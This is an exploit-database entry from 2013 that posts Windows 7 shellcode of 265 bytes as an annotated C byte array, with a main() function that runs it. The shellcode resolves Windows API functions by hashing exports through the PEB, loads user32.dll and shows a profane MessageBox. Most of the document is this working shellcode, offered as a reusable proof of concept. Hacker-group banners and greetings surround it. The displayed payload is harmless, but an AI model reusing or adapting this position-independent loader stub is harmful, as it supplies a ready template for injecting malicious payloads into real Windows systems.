Windows7 Sub_Xor MessageBox Exec Shellcode - 265 Bytes

2013-03-08T00:00:00
ID 1337DAY-ID-20485
Type zdt
Reporter KedAns-Dz
Modified 2013-03-08T00:00:00

Description

Windows7 Sub_Xor MessageBox Exec Shellcode 265 Bytes + Msg.&.Title

                                        
                                            /*

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
###
# Title : Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows7
###

# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !

proof / test img : http://oi47.tinypic.com/2cs6g3n.jpg

*/

#include <stdio.h>
#include <string.h>

// Windows7 Sub_Xor MessageBox Exec Shellcode - (265 + Msg.&.Title) Bytes

char msg[] = 
"\xD9\xEB"     // FLDPI
"\x9B"         // WAIT
"\xD9\x74\x24\xF4"   // FSTENV %ESP
// ----------
"\x31\xD2"           // XOR %EDX,%EDX
"\xB2\x77"           // MOV %DL, 0x77
"\x31\xC9"           // XOR %ECX,%ECX
"\x64\x8B\x71\x30"   // MOV %ESI,DWORD 0x30
"\x8B\x76\x0C"       // MOV %ESI,DWORD %ESI
"\x8B\x76\x1C"       // MOV %ESI,DWORD %ESI 0x1C
"\x8B\x46\x08"       // MOV %EAX,DWORD %ESI 0x08
"\x8B\x7E\x20"       // MOV %EDI,DWORD %ESI 0x20
"\x8B\x36"           // MOV %ESI,DWORD %ESI
"\x38\x4F\x18"       // CMP BYTE %EDI 0x18,%CL
"\x75\xF3"           // JNZ SHORT .me
"\x59"               // POP %ECX
"\x01\xD1"           // ADD %ECX,%EDX
"\xFF\xE1"           // JMP %ECX
"\x60"               // PUSHAD
"\x8B\x6C\x24\x24"   // MOV %EBP,DWORD %ESP 0x24
"\x8B\x45\x3C"       // MOV %EAX,DWORD %EBP 0x3C
"\x8B\x54\x28\x78"   // MOV %EDX,DWORD %EAX %EBP 0x78
"\x01\xEA"           // ADD %EDX,%EBP
"\x8B\x4A\x18"       // MOV %ECX,DWORD %EDX 0x18
"\x8B\x5A\x20"       // MOV %EBX,DWORD %EDX 0x20
"\x01\xEB"           // ADD %EBX,%EBP
"\xE3\x34"           // JECXZ SHORT .me
"\x49"               // DEC %ECX
"\x8B\x34\x8B"       // MOV %ESI,DWORD %EBX %ECX
"\x01\xEE"           // ADD %ESI,%EBP
"\x31\xFF"           // XOR %EDI,%EDI
"\x31\xC0"           // XOR %EAX,%EAX
"\xFC"               // CLD
"\xAC"               // LODS BYTE %ESI
"\x84\xC0"           // TEST %AL,%AL
"\x74\x07"           // JE SHORT .me
"\xC1\xCF\x0D"       // ROR %EDI, 0x0D
"\x01\xC7"           // ADD %EDI,%EAX
"\xEB\xF4"           // JMP SHORT .me
"\x3B\x7C\x24\x28"   // CMP %EDI,DWORD %ESP 0x28
"\x75\xE1"           // JNZ SHORT .me
"\x8B\x5A\x24"       // MOV %EBX,DWORD %EDX 0x24
"\x01\xEB"           // ADD %EBX,%EBP
"\x66\x8B\x0C\x4B"   // MOV %EBX %ECX
"\x8B\x5A\x1C"       // MOV %EBX,DWORD %EDX 0x1C
"\x01\xEB"           // ADD %EBX,%EBP
"\x8B\x04\x8B"       // MOV %EAX,DWORD %EBX %ECX
"\x01\xE8"           // ADD %EAX,%EBP
"\x89\x44\x24\x1C"   // MOV DWORD %ESP 0x1C,%EAX
"\x61"               // POPAD
"\xC3"               // RETN
 /* Free GAZzA! */
"\xB2\x08"           // MOV %DL,0x08
"\x29\xD4"           // SUB %ESP,%EDX
"\x89\xE5"           // MOV %EBP,%ESP
"\x89\xC2"           // MOV %EDX,%EAX
"\x68\x8E\x4E\x0E\xEC"  // PUSH 0xEC0E4E8E
"\x52"               // PUSH %EDX
"\xE8\x9F\xFF\xFF\xFF"  // CALL .me
"\x89\x45\x04"       // MOV DWORD %EBP 0x04,%EAX
"\xBB\x7E\xD8\xE2\x73"  // MOV %EBX,0x73E2D87E
"\x87\x1C\x24"       // XCHG DWORD %ESP,%EBX
"\x52"               // PUSH %EDX
"\xE8\x8E\xFF\xFF\xFF"  // CALL .me
"\x89\x45\x08"       // MOV DWORD %EBP 0x08,%EAX
"\x68\x6C\x6C\x20\x41"  // PUSH 0x41206C6C
"\x68\x33\x32\x2E\x64"  // PUSH 0x642E3233
"\x68\x75\x73\x65\x72"  // PUSH 0x72657375
"\x88\x5C\x24\x0A"      // MOV BYTE %ESP 0x0A,%BL
"\x89\xE6"           // MOV %ESI,%ESP
"\x56"               // PUSH %ESI
"\xFF\x55\x04"       // CALL DWORD %EBP 0x04
"\x89\xC2"           // MOV %EDX,%EAX
"\x50"               // PUSH %EAX
"\xBB\xA8\xA2\x4D\xBC"   // MOV %EBX,0xBC4DA2A8
"\x87\x1C\x24"       // XCHG DWORD %ESP,%EBX
"\x52"               // PUSH %EDX
"\xE8\x61\xFF\xFF\xFF"  // CALL .me
// ----------
 /* Message Title */ 
"\x68\x49\x2E\x50\x58"  // PUSH 0x58502E49
"\x68\x21\x20\x52\x2E"  // PUSH 0x2E522021
"\x68\x20\x59\x6F\x75"  // PUSH 0x756F5920
"\x68\x46\x75\x63\x6B"  // PUSH 0x6B637546
// ----------
"\x31\xDB"           // XOR %EBX,%EBX
"\x88\x5C\x24\x0F"   // MOV BYTE %ESP 0x0F,%BL
"\x89\xE3"           // MOV %EBX,%ESP
// ----------
 /* Message Content */
"\x68\x2D\x44\x7A\x58"  // PUSH 0x587A442D
"\x68\x64\x41\x6E\x73"  // PUSH 0x736E4164
"\x68\x79\x20\x4B\x65"  // PUSH 0x654B2079
"\x68\x65\x64\x20\x42"  // PUSH 0x42206465
"\x68\x48\x61\x43\x6B"  // PUSH 0x6B436148
// ----------
"\x31\xC9"           // XOR %ECX,%ECX
"\x88"               // MOV BYTE
"\x4C"               // DEC %ESP
"\x24\x13"           // AND %AL,0x13
"\x89\xE1"           // MOV %ECX,%ESP
"\x31\xD2"           // XOR %EDX,%EDX
"\x52"               // PUSH %EDX
"\x53"               // PUSH %EBX
"\x51"               // PUSH %ECX
"\x52"               // PUSH %EDX
"\xFF\xD0"           // CALL %EAX
"\x31\xC0"           // XOR %EAX,%EAX
"\x50"               // PUSH %EAX
"\xFF\x55\x08";      // CALL DWORD %EBP 0x08

int main()
{
    int (*dz)() = (int(*)())msg;
        printf("bytes: %u\n", strlen(msg));
        dz();
}

/*
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================*/

#  0day.today [2018-03-13]  #